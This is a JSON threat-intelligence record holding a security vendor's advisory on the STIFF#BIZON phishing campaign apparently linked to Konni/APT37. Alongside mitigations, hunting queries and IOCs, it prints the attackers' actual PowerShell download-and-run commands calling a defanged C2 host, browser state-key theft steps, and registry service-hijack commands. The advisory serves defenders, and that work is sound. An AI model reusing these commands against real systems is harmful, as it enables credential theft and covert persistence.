{ "id": "34dd9653-eaeb-409e-a620-b4861a86c978", "created_at": "2026-04-06T00:15:30.623027Z", "updated_at": "2026-04-10T13:12:03.270275Z", "deleted_at": null, "sha1_hash": "15830da9eb1ece90c6e53e04e43df3353bc18311", "title": "Securonix Threat Labs Initial Coverage Advisory: STIFF#BIZON Detection Using Securonix – New Attack Campaign Observed Possibly Linked to Konni/APT37 (North Korea)", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4067294, "plain_text": "Securonix Threat Labs Initial Coverage Advisory: STIFF#BIZON\r\nDetection Using Securonix – New Attack Campaign Observed\r\nPossibly Linked to Konni/APT37 (North Korea)\r\nArchived: 2026-04-05 12:38:05 UTC\r\nBy Securonix Threat Labs, Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov\r\nLast Updated: July 20, 2022\r\nIntroduction\r\nThe Securonix Threat Research (STR) team has been observing and investigating a new attack campaign\r\nexploiting high-value targets, including Czech Republic, Poland, and other countries. The attack campaign has\r\nbeen tracked by STR as STIFF#BIZON.\r\nBased on the tradecraft and artifacts observed by the Threat Research team as part of this on-going campaign,\r\nsome of the artifacts and tradecraft observed are known to be associated with Konni (APT37 in North Korea)\r\nmalicious activity (see details below.)\r\nBackground\r\nKonni malware is classified as a RAT (remote access trojan) which was heavily used by APT37, contains built-in\r\nfunctions to elevate privileges and maintain persistence on the affected host. This particular malware was\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 1 of 26\n\ndiscovered in 2014 and has been attributed to the North Korean APT37 group[3]\r\n.\r\nSTIFF#BIZON – Attack Chain: High Level Overview\r\nThe initial infil part of the attack chain is relatively trivial and unremarkable. The infection starts through phishing\r\nemails, which attempt to lure the victim to open a malicious attachment. In this particular case the threat actors\r\nattached a file containing the malware.\r\nThe overall attack chain can be seen in Figure 1 below:\r\nFigure 1\r\nSTIFF#BIZON: Stage 1 initial compromise\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 2 of 26\n\nThe new Konni-based malware was embedded into a phishing document as a compressed file attachment. Inside\r\nthe archive are the files “missile.docx” “_weapons.doc.lnk”\r\nThe initial compromise through malicious .lnk files is something we’ve seen with other loaders such as\r\nBumblebee[9], and related DogWalk[10] phishing campaigns.\r\nThe code execution begins by embedding small snippets of code into the shortcut file which will run and execute\r\nalong with the intended binary when the user double clicks on it.\r\nFigure 2\r\nThis code runs and executes Base64 encoded text appended to the end of the missile.docx file which can be seen\r\nin figure 3:\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 3 of 26\n\nFigure 3\r\nThe Base64 payload is executed as another PowerShell stager which initiates C2 communication and downloads\r\nand runs both “weapons.doc” and “wp.vbs” files.\r\nFigure 4\r\nThe final doc is then opened on the victim’s computer as seen in the figure below. The second file that was\r\ndownloaded from the script, wp.vbs silently runs in the background and sets stage 2 in motion with further code\r\nexecution.\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 4 of 26\n\nFigure 5\r\nThe lure document was allegedly created by Ольга Божьева (Olga Bozheva) on Jun 16, 2022. The name and\r\nother metadata can be seen in figure 5. The alleged author is known to be a war correspondent in Russia (see\r\nfigure 6.1)\r\nFigure 6\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 5 of 26\n\nFigure 6.1\r\nSTIFF#BIZON: Stage 2 loading the RAT\r\nThe wp.vbs file which was downloaded and executed in the previous section does a couple of interesting things.\r\nAs seen in figure 7 below, the malicious VBscript file creates a new scheduled task called “Office Update”,  . The\r\nscheduled task executes a PowerShell script encoded in Base64.\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 6 of 26\n\nFigure 7\r\nAt this point C2 communications are once again established which provides the attacker access to the system.\r\nSTIFF#BIZON: C2 communication\r\nOnce the attackers had access to the system, we observed the following activity and URL structures which give us\r\nmore information.\r\nDownload lure document: weapons.doc:\r\n/view.php?name=”+[Environment]::MachineName+”\u0026tp=”+[Environment]::OSVersion\r\nDownload wp.vbs:\r\n/info.php?name=”+[Environment]::MachineName+”\u0026tp=”+[Environment]::OSVersion\r\nRequest .NET assembly from C2 server that will be loaded into memory\r\n/dn.php?name=’+[System.Environment]::MachineName+’\u0026prefix=qq\u0026tp=’+[System.Environment]::OSVersion\r\nexample:\r\n[System.Reflection.Assembly]::Load($buf);$ep=$bin.EntryPoint;$ep.ToString();$ep.Invoke($null,$null);\r\nSTIFF#BIZON: Capabilities\r\nTo help us understand the motivations behind the APT group and loaded malware we analyzed the following\r\ncapabilities that were loaded into the victim machine.\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 7 of 26\n\nWe observed following modules that were served by threat actor:\r\nCapture.net.exe which was used to create a screenshot using Win32 GDI API and upload the gzipped results to\r\nthe C2 server. This can be seen in figures 8 and 9 below.\r\nFigure 8\r\nFigure 9\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 8 of 26\n\nThe next module that was loaded is chkey.net.exe which was used to extract a state key which is stored in the\r\nLocal State file. This state key is encrypted using DPAPI. With a state key, a threat actor (TA) can decrypt the\r\ncookie database offline and use this to import cookies into a machine controlled by the TA and access any\r\navailable services without MFA authentication.\r\nFigure 10\r\nFigure 11\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 9 of 26\n\nFigure 12\r\nThe next loaded module is pull.net.exe which we observed extracting saved logins, passwords, and URLs in the\r\nvictim’s browser “Login Data” file.\r\nFigure 13\r\nThe next module, shell.net.exe was leveraged and provided the threat actor an “interactive shell” that would check\r\nand run commands from the attacker every 10 seconds. The loaded module can be seen in figures 14-16 below.\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 10 of 26\n\nFigure 14\r\nFigure 15\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 11 of 26\n\nFigure 16\r\nThe module shell.net.exe provided the following C2 communication command structure:\r\nReceive commands from shell.net.exe assembly module (interactive shell):\r\n/dn.php?name=name=”+[Environment]::MachineName+”\u0026prefix=kk\r\nTransfer tools/TA files to victim host:\r\n/dn.php?name=”+[Environment]::MachineName+”\u0026prefix=mm\r\nSend results of commands execution (.net assembly modules)\r\n/up.php?name    =”+[Environment]::MachineName\r\nSTIFF#BIZON: Modus Operandi:\r\nOperator activity often starts at ~ 1:00-7 a.m. UTC time.\r\nOperators transfer tools and other files from an external system into a compromised environment\r\ncompressed in .cab archives.\r\nCommands executed are shell.net.exe .net assembly module\r\nInitial recon begins:\r\ncmd /c cd /d “C:\\Users” \u0026\u0026 dir /a/o-d/s *.*\r\ncmd /c tasklist\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 12 of 26\n\ncmd /c systeminfo\r\ncmd /c wmic logicaldisk get caption,description,drivetype,filesystem,freespace,size,volumename\r\ncmd /c query session\r\nDump of browser state key (search for edge AES state key, master key)\r\npowershell -ep bypass -command “$url=’hxxp://547857[.]c1[.]biz/dn.php?name=’+\r\n[System.Environment]::MachineName+’\r\n\u0026prefix=mm’;$client=new-object System.Net.WebClient;$rep=$client.DownloadString($url);\r\n$buf=[Convert]::FromBase64String($rep);$fn=[System.Environment]::GetEnvironmentVariable(‘temp’)`\r\n+’\\z.exe’;[System.IO.File]::WriteAllBytes($fn, $buf);”\r\ncmd /c cd /d %TEMP% \u0026\u0026 z.exe “C:\\Users\\bhenson\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State”\r\ncmd /c del /f /q “%TEMP%\\z.exe”\r\nService installation for persistence\r\npowershell -ep bypass -command “$url=’hxxp://547857[.]c1[.]biz/dn.php?name=’+\r\n[System.Environment]::MachineName\r\n+’\u0026prefix=mm’;$rep=(New-Object System.Net.WebClient).DownloadString($url);\r\n$buf=[Convert]::FromBase64String($rep);$fn=’C:\\Users\\jalston\\AppData\\Local\\Temp\\1.cab’;\r\n[System.IO.File]::WriteAllBytes($fn, $buf);”\r\ncmd /c cd /d “C:\\Users\\REDACTED\\AppData\\Local\\Temp” \u0026\u0026 dir /a/o-d/s *.*\r\ncmd /c expand %TEMP%\\1.cab -f:* %TEMP%\r\ncmd /c cd /d “C:\\Users\\REDACTED\\AppData\\Local\\Temp” \u0026\u0026 dir /a/o-d/s *.*\r\ncmd /c del /f /q “C:\\Users\\REDACTED\\1.cab”\r\ncmd /c cd /d “C:\\Users\\REDACTED\\AppData\\Local\\Temp” \u0026\u0026 dir /a/o-d/s *.*\r\ncmd /c cd /d “C:\\Users\\REDACTED\\AppData\\Local\\Temp” \u0026\u0026 expand 1.cab -f:* %cd%\r\ncmd /c C:\\Users\\REDACTED\\AppData\\Local\\Temp\\food.bat\r\ncmd /c sc query wpcsvc\r\ncmd /c sc query wpcsvc\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 13 of 26\n\ncmd /c rundll32 “%TEMP%\\wpnprv.dll”, IIIIIIII 4 “cmd /c del /f /q C:\\Windows\\system32\\wpcsvc.*”\r\ncmd /c rundll32 “%TEMP%\\wpnprv.dll”, IIIIIIII 4 “cmd /c del /f /q C:\\Windows\\system32\\wnlsvc.*”\r\ncmd /c tasklist /m wnlsvc.dll\r\nz.exe\r\nThis executable is used to dump chromium browser state keys. From Chromium 80+ cookies are encrypted using\r\nAES-256 GCM, with a state key which is stored in the Local State file. This state key is encrypted using DPAPI.\r\nWith the state key, the threat actors are able to decrypt the cookie database offline and use cookies to access\r\nservices without MFA.\r\nNote: The usage of the letter “z” in z.exe may further indicate Russian origins as “z” has been recently used as a\r\nRussian military symbol.\r\nFigure 17\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 14 of 26\n\nFigure 18\r\nSTIFF#BIZON: Stage 4 – Analysis\r\nDuring this stage of the infection, the attacker has some control over the host and is able to download and execute\r\ncommands. To further the persistence phase, a modified version of Konni malware appears to have been used.\r\nAttackers were able to download a .cab file containing several files related to the malware:\r\nbat\r\nbat\r\ndll\r\ndat\r\nini\r\ndll\r\nLet’s take a look at each of these files in execution order.\r\nfood.bat\r\nUsed to execute seed.bat from current user context or via user/domain credentials hardcoded in wpnprv.dll.\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 15 of 26\n\nFigure 19\r\nseed.bat\r\nThis file contains commands that are used to replace the legitimate Windows service “wpcsvc” (Windows parental\r\ncontrol service) with a malicious DLL wpcsvc.dll and encoded configuration files: wpcsvc.dat wpcsvc.ini\r\nFigure 20\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 16 of 26\n\nWpnprv.dll\r\nThis is used as a proxy DLL with the EntryPoint function to “IIIIIIII” to execute commands depending on\r\nparameters:\r\nExample: cmd /c rundll32 “C:\\Users\\username\\AppData\\Local\\Temp\\wpnprv.dll”, IIIIIIII 4 “cmd /c del /f /q\r\nC:\\Windows\\system32\\wpcsvc.dll”\r\nIf the parameter is “4” will be executed sub_180002030\r\nIn any other case will be executed sub_18001B70\r\nFigure 21\r\nIf the parameter is set to “4” then this sample DLL will use anti-debugging techniques with API\r\nWaitForDebugEvent and ContinueDebugEvent to execute passed cmdline.\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 17 of 26\n\nFigure 22\r\nFigure 23\r\nIf a parameter other than “4” is supplied to the sample dll, it will execute commands with higher privileges by\r\nrunning wusa.exe (a Windows Update Standalone Installer, located in the System32 folder), running as high-https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 18 of 26\n\nintegrity process by default and spawn cmd.exe in high-integrity level. This technique was leaked in 2017 from\r\nWikiLeaks as part of “Vault 7″ material.\r\nThe same implementation of this technique in PowerShell can be found in this entry.\r\nhttps://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1\r\nThis technique can be seen in figures 24 and 25:\r\nFigure 24\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 19 of 26\n\nFigure 25\r\nWpcsvc.dll, wpcsvc.dat, wpcsvc.ini\r\nThese provide several functions but are primarily used for persistence by:\r\n1. Stopping wpcsvc\r\n2. Copying Wpcsvc.dll wpcsvc.dat wpcsvc to System32 folder\r\n3. Modifying/creating binpath,description and autostart service settings\r\n4. Adding service wpcsvc under SVCHOST.EXE context:\r\nreg add “HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost” /v wpcsvc /t  REG_MULTI_SZ\r\n/d “wpcsvc” /f \u003e nul\r\nAnd specifying the malicious dll to be used with this service:\r\nreg add “HKLM\\SYSTEM\\CurrentControlSet\\Services\\wpcsvc\\Parameters” /v ServiceDll /t REG_EXPAND_SZ\r\n/d “%windir%\\System32\\wpcsvc.dll” /f \u003e nul\r\n1. Restarting the service wpcsvc\r\nConclusion: Connecting the dots\r\nAs shown above, the current attribution to APT37 is possible, but not 100% certain due to the dynamic nature of\r\nthe artifacts and the shared opsec, tradecraft and malware variants observed. Additionally, there seems to be a\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 20 of 26\n\ndirect correlation between IP addresses, hosting provider and hostnames between this attack and historical data\r\nwe’ve previously seen from FancyBear/APT28[3]. In the end, what makes this particular case interesting is the\r\nusage of Konni malware in conjunction with tradecraft similarities to APT28.\r\nSpeculation and false flags\r\nCurrently, STIFF#BIZON related activities are currently ongoing and something the Securonix Threat Research\r\nteam is currently tracking. It is always important to consider the possibility of false flag operations where one APT\r\ngroup may be masquerading as another in order to avoid scrutiny. This is much more common with state-sponsored attacks.\r\nSecuronix mitigations and recommendations\r\nSecure credentials. Russian state-sponsored APT actors have demonstrated their ability to maintain\r\npersistence using compromised credentials[11]\r\nUse virtualization solutions on modern hardware and software to ensure credentials are securely\r\nstored.\r\nDisable the storage of clear text passwords in LSASS memory.\r\nConsider disabling or limiting New Technology Local Area Network Manager (NTLM) and\r\nWDigest Authentication.\r\nImplement Credential Guard for Windows 10 and Server 2016 (Refer to Microsoft: Manage\r\nWindows Defender Credential Guard for more information). For Windows Server 2012R2, enable\r\nProtected Process Light for Local Security Authority (LSA).\r\nMinimize the Active Directory attack surface to reduce malicious ticket-granting activity. Malicious\r\nactivity such as “Kerberoasting” takes advantage of Kerberos’ TGS and can be used to obtain\r\nhashed credentials that attackers attempt to crack.\r\nDeploy PowerShell script block logging to assist in detections.\r\nWhen it comes to any type of malware, Securonix strongly recommends that AV definitions as well as\r\noperating systems are patched and up to date.\r\nAvoid opening any attachments especially from those that are unexpected or are from outside the\r\norganization. Consider blocking specific extensions such as .zip or .iso archives from being delivered to the\r\nrecipient.\r\nImplement application and script execution policies that limit PowerShell and VBscript execution.\r\nImplement geo blocking policies on the firewall and blacklist unexpected countries.\r\nSecuronix detection policies\r\nSuspicious PowerShell Command From LOLbin Process Analytic\r\nSuspicious Scheduled Task Creation Run From Public Dir Analytic\r\nSuspicious wscript.exe Child Process Creation Analytic\r\nSuspicious PowerShell In .lnk File Process Pattern Analytic\r\nSuspicious Attempt To Access Browser Local State Folder CommandLine Analytic\r\nFile And Directory Enumeration CommandLine Analytic\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 21 of 26\n\nPotential System Binary Proxy Execution CommandLine Analytic\r\nSuspicious Service Modification CommandLine Analytic\r\nSuspicious Service Failure Action Modification CommandLine Analytic\r\nAnd others.\r\nHunting queries\r\n(rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web Application Firewall” OR\r\nrg_functionality = “Web Server” OR rg_functionality = “Web Proxy”) AND (requesturl CONTAINS\r\n“info.php?name=” OR requesturl CONTAINS “dn.php?name=” OR requesturl CONTAINS “up.php?\r\nname=”)\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR\r\ndeviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR\r\ndeviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction =\r\n“WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR\r\ndeviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity:\r\nLaunched”) AND destinationprocessname ENDS WITH “rundll32.exe” AND resourcecustomfield1\r\nCONTAINS ” iiiiiiii “\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR\r\ndeviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR\r\ndeviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction =\r\n“WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR\r\ndeviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity:\r\nLaunched”) AND resourcecustomfield1 CONTAINS “\\AppData\\Local\\” AND resourcecustomfield1\r\nCONTAINS “\\User Data\\Local State”\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction ENDS WITH “Written” OR\r\ndeviceaction = “File created”) AND destinationprocessname ENDS WITH “powershell.exe” AND filepath\r\nCONTAINS “\\appdata\\local\\temp\\rr” AND filepath CONTAINS “.tar.gz”\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR\r\ndeviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR\r\ndeviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction =\r\n“WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR\r\ndeviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity:\r\nLaunched”) AND resourcecustomfield1 CONTAINS “cd /d” AND resourcecustomfield1 CONTAINS ” dir\r\n” AND resourcecustomfield1 CONTAINS ” /a/o-d/s ” AND resourcecustomfield1 CONTAINS ” *.”\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR\r\ndeviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR\r\ndeviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction =\r\n“WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR\r\ndeviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity:\r\nLaunched”) AND destinationprocessname ENDS WITH “expand.exe” AND resourcecustomfield1\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 22 of 26\n\nCONTAINS “.cab” AND resourcecustomfield1 CONTAINS “-f:” AND sourceprocessname ENDS WITH\r\n“cmd.exe”\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR\r\ndeviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR\r\ndeviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction =\r\n“WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR\r\ndeviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity:\r\nLaunched”) AND destinationprocessname ENDS WITH “rundll32.exe” AND resourcecustomfield1\r\nCONTAINS “cmd.exe” AND resourcecustomfield1 CONTAINS “/c”\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR\r\ndeviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR\r\ndeviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction =\r\n“WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR\r\ndeviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity:\r\nLaunched”) AND destinationprocessname ENDS WITH “reg.exe” AND resourcecustomfield1\r\nCONTAINS ” add ” AND resourcecustomfield1 CONTAINS “console” AND resourcecustomfield1\r\nCONTAINS “codepage” AND resourcecustomfield1 CONTAINS “65001”\r\n(rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR\r\ndeviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR\r\ndeviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction =\r\n“WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR\r\ndeviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity:\r\nLaunched”)) AND (destinationprocessname ENDS WITH “reg.exe” AND resourcecustomfield1\r\nCONTAINS ” add “) AND ((resourcecustomfield1 CONTAINS “system\\currentcontrolset\\services” AND\r\nresourcecustomfield1 CONTAINS “reg_expand_sz”) OR (resourcecustomfield1 CONTAINS\r\n“software\\microsoft\\windows nt\\currentversion\\svchost” AND resourcecustomfield1 CONTAINS\r\n“reg_multi_sz”))\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR\r\ndeviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR\r\ndeviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction =\r\n“WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR\r\ndeviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity:\r\nLaunched”) AND destinationprocessname ENDS WITH “sc.exe” AND resourcecustomfield1 CONTAINS\r\n” failure ” AND resourcecustomfield1 CONTAINS ” reset=” AND resourcecustomfield1 CONTAINS ”\r\nactions=”\r\nSTIFF#BIZON – MITRE ATT\u0026CK techniques\r\nTactic Technique\r\nInitial Access T1566.001 Spearphishing Attachment\r\nExecution T1059.001 PowerShell\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 23 of 26\n\nT1059.003 Windows Command Shell\r\nT1059.005 Visual Basic\r\nT1053.005 Scheduled Task\r\nT1569.002 Service Execution\r\nT1204.002 Malicious File\r\nPersistence\r\nT1543.003 Windows Service\r\nT1053.Scheduled Task\r\nPrivilege Escalation\r\nT1134.001 Token Impersonation/Theft\r\nT1543.003 Windows Service\r\nDefense Evasion\r\nT1548.002 Bypass User Account Control\r\nT1134.001 Token Impersonation/Theft\r\nT1070.004 File Deletion\r\nT1027.005 Indicator Removal from Tools\r\nCredential Access\r\nT1555.003 Credentials from Web Browsers\r\nT1606.001 Web Cookies\r\nT1539 Steal Web Session Cookie\r\nDiscovery\r\nT1082 System Information Discovery\r\nT1057 Process discovery\r\nT1007 System Service Discovery\r\nT1033 System Owner/User Discovery\r\nCollection\r\nT1560.003 Archive via Custom Method\r\nT1113 Screen Capture\r\nT1119 Automated Collection\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 24 of 26\n\nCommand and Control\r\nT1071.001 Web Protocols\r\nT1132.001 Standard Encoding\r\nT1105 Ingress Tool Transfer\r\nExfiltration\r\nT1020 Automated Exfiltrated\r\nT1041 Exfiltration Over C2 Channel\r\nSTIFF#BIZON – Indicators of compromise\r\nHost Communication\r\n185[.]176.43.106\r\n547857[.]c1[.]biz\r\n65487[.]c1[.]biz\r\nFile Name SHA256 (Dynamic/Custom implants)\r\nfood.bat 07b10c5a772f6f3136eb58a7034bcb5ce71c0c740aaa528d3bae318d939b2242\r\nseed.bat 5d28072d76bd6af944fcec8045cbc24410a58fe70eef6f83c50934245ec92e60\r\nwpcsvc.dat b9727fb553894d857900c0a18f82723659d136329ef56bbe9388905a666f1197\r\nwpcsvc.dll 12df9753abd867118ce97e6570c2bde780c7913ecab4b91ef7f540c4fede2772\r\nwpcsvc.ini 6f325fb0a7de6f05490f1eb3c0e5826a44a11ed2dee4c17f486b8200f539d49e\r\nwpnprv.dll 35d38eed9168c16d2dd595fa9542a411080d12de971ea3d3c12dd5c44e454049\r\nweapons.doc 31a9801e5e2e5fd7f66f23bc8456069b6a958e03838e431ccf7d84867f88c840\r\n_weapons.doc.lnk 5fce9f27326549cc6091ba1f806e7c161878a2642411a941ba484b0c1c7adb8f\r\n wp.vbs 9f27430ed919e74c81b0487542fe29a65a0b860a6a290e3b032f3a5ba7c691bc\r\nz.exe b6987a717741329d5b64f769c9d3f1f572b42c7375dd841aecbf2b6d4096d6de\r\ncapture.net.exe dee7826f5b7f0cbc97a81de8f6844a011cc836269bc5d00a0594dfec5386613c\r\nchkey.net.exe 44566d506e0348c999a66ee5158b0014a74bdd3f038e40ca76e5b069b8991f85\r\npull.net.exe 9c82477eac14abfb7f507806a941e4e5633dd07c4b73a44b10296ec28e3df162\r\nshell.net.exe 5f3483823342318c4154bbef806cec2187a0360f079237a456603896ff7f5473\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 25 of 26\n\nReferences\r\n[1]: APT28: AT THE CENTER OF THE STORM, January, 2017\r\nhttps://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf\r\n[2]: CrowdStrike’s work with the Democratic National Committee: Setting the record straight, June 5, 2020 \r\nhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/\r\n[3]: New variant of Konni malware used in campaign targeting Russia, August 23, 2021\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/\r\n[4]: Vault 7: CIA Hacking Tools Revealed, March 7, 2017 https://wikileaks.org/ciav7p1/\r\n[5]: PowerShell-Suite/UAC-TokenMagic.ps1, July 15, 2017 https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1\r\n[6]: Indicators of Compromise for Malware used by APT28, October 4, 2018 https://www.thecssc.com/wp-content/uploads/2018/10/4OctoberIOC-APT28-malware-advisory.pdf\r\n[7]: A deeper look at hacking groups and malware targeting Ukraine, April 27, 2022 https://therecord.media/a-deeper-look-at-hacking-groups-and-malware-targeting-ukraine/\r\n[8] APT Attackers Flying More False Flags Than Ever, March 17, 2016 https://threatpost.com/apt-attackers-flying-more-false-flags-than-ever/116814/\r\n[9] Securonix Threat Labs Initial Coverage Advisory: Analysis and Detection of BumbleBee Loader Using\r\nSecuronix, July 5, 2022 https://www.securonix.com/blog/securonix-threat-labs-initial-coverage-advisory-analysis-and-detection-of-bumblebee-loader-using-securonix/\r\n[10] Securonix Threat Labs Initial Coverage Advisory: Detecting Microsoft MSDT “DogWalk” .diagcab 0-Day\r\nUsing Securonix, June 09, 2022https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/\r\n[11] CISA Alert. Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical\r\nInfrastructure. March 01, 2022. https://www.cisa.gov/uscert/ncas/alerts/aa22-011a\r\n[13]: North Korea recognizes “DPR” and “LPR”, July 13, 2022 https://ukrainetoday.org/2022/07/13/north-korea-recognizes-dpr/\r\nSource: https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nhttps://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/\r\nPage 26 of 26\n\nWe observed Capture.net.exe following modules which was that were served used to create a screenshot by threat actor: using Win32 GDI API and upload the gzipped results to\nthe C2 server. This can be seen in figures 8 and 9 below.\nFigure 8 \nFigure 9 \n Page 8 of 26", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MISPGALAXY", "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/" ], "report_names": [ "stiffbizon-detection-new-attack-campaign-observed" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "aa65d2c9-a9d7-4bf9-9d56-c8de16eee5f4", "created_at": "2025-08-07T02:03:25.096857Z", "updated_at": "2026-04-10T02:00:03.659118Z", "deleted_at": null, "main_name": "NICKEL JUNIPER", "aliases": [ "Konni", "OSMIUM ", "Opal Sleet " ], "source_name": "Secureworks:NICKEL JUNIPER", "tools": [ "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb", "created_at": 